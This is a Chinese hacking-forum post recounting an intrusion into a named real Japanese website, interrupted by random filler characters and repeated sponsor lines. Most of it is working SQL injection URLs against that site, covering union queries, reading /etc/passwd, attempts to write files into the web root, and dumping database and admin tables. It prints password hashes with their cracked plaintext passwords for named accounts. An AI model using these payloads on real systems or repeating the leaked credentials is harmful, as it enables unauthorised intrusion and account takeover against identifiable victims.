原创 检测汉奸站全过程

xiancda

补：www.zuaa.jp测试

5 M  d$ d* P. `! W; I; A
) n8 J/ e  e! L7 T5 O0x01. 检测 www.zuaa.jp 收集数据

" f  j& b5 M6 z0 W& [1 J& }
whatweb
$ k1 {) }: Z: t* U# f

* F' x8 w7 `* U6 V3 t% i利用NMAP扫描

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
4 [+ U8 D9 ?1 N6 d8 o) ~; |9 S0x02.找注入点
找注入点：http://www.zuaa.jp/php/newsdetail.php?topic_id=390


  Y6 a1 Q7 Z. w3 M0x03.order by
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1

order by 28报错，order by 27正常

0x04.   union手动查询
0 t6 y$ q: G* }6 {http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
$ p" E5 `4 E$ N' |; [) `4 @2 I添加到 27 时正常显示

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
0 ^: z8 m7 J5 t8 H% I+ C
0x05. info:
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
9 B. u# ~9 C# ^" X8 f% |/ o
) t" M7 m" J& V9 r2 t, [' \- |user:            root@localhost
database:    openpne
4 ]) k9 ]$ Q  {* B1 Vversion:      4.1.22
os:             portbld-freebsd5.4
/ o: j( ~  T! X+ [
8 q& V- x+ Y$ a$ p5 h0x06. root用户
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的（这种方法， 可以过大多数站）
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
% a! X% U9 E2 O% I0 m
4 @; R  c  G) ~$ E3 M1 g  z2 N2 T通过工具转换

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
0 L  c; x+ ]$ L* R' S; V6 Y
0x07. 利用 into outfile
, ?5 A4 f2 V& h3 @1 z6 O- ]- u% o全部都失败
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
7 o" h% f+ R$ q" V5 J7 O
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php

页面显示“MDB2 Error:syntax error”

0x08. 利用 mysql 4.1
) f; G" A# c# c4 [( h2 r猜常规表名，字段未果 工具 sqlmap
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
- x) g- v7 J8 a
3 l( k6 a9 p, G9 g/ N9 i
" Y6 s( q1 g- h" i
0x09. 查找后台
% y6 U' z) o* k; K" @+ Y/ w利用 现有的各种 后台工具尝试都不行

7 H2 w+ t. t7 E. c+ n; P$ |, A0x10.  MySL外联方法
从前面 nmap 收集的信息当中，可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码，然后再通过 mysql 工具外连 www.zuaa.jp 不行
6 {  Q1 @- X: T( @7 {5 x可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user

$ L4 j2 m! V$ k& o% c这个可以在 www.cmd5.com 解密
0 [- G' Y: c7 \) u# D9 Sroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
- \8 H6 n) V7 N: C5 Zopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
/ ?1 e- Z9 u4 o' T! H7 ~5 A5 u6 hzuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
工具外连失败，据说防火墙策略只允许特定IP外连，具体不得知
% Q$ S, d  `3 I8 k! t( e
7 g* x: \: A3 R# x2 W. G
7 ?% u* V( ]; E' _7 `/ I0x11. 网站突破
. X* b+ w, D0 X# c( B发现网站的源程序 openpne, google 下载 openpne 源码

; Z* ~5 E! y  b' U
0x12. 默认信息利用
http://sns.zuaa.jp/?m=admin&a=page_login

5 Y. P, Y# b' s0 g/ a( J2 j表名 (c_admin_user) ，字段名（username,password）
2 u0 Q; C2 v0 Y9 y& ahttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
0 u8 L% x4 j& B6 A
解密
+ |0 i2 M# B2 j4 ?4 ]/ Lzuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
zuaajp:c0923ec5857796a393da99905008c176,          zju1897

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

( S" z# a7 E. l9 ?; }4 x0x13. 登录后台

% c+ K7 ?3 f9 Y8 z

0x14. 小结
2 P+ x  k- a& v3 d- ~0 {2 R. A利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 。
) q% U" B( r& y( v7 t感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
: m; q* d) B* S& q0 O6 Q------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
4 _0 Y" [1 c7 l9 j* d
最后声明：本人只负责了整理上传到论坛，让大家学习，不是原作者，原作者辛苦了！

荒村狂客

哪个牛人 费的这劲 入侵的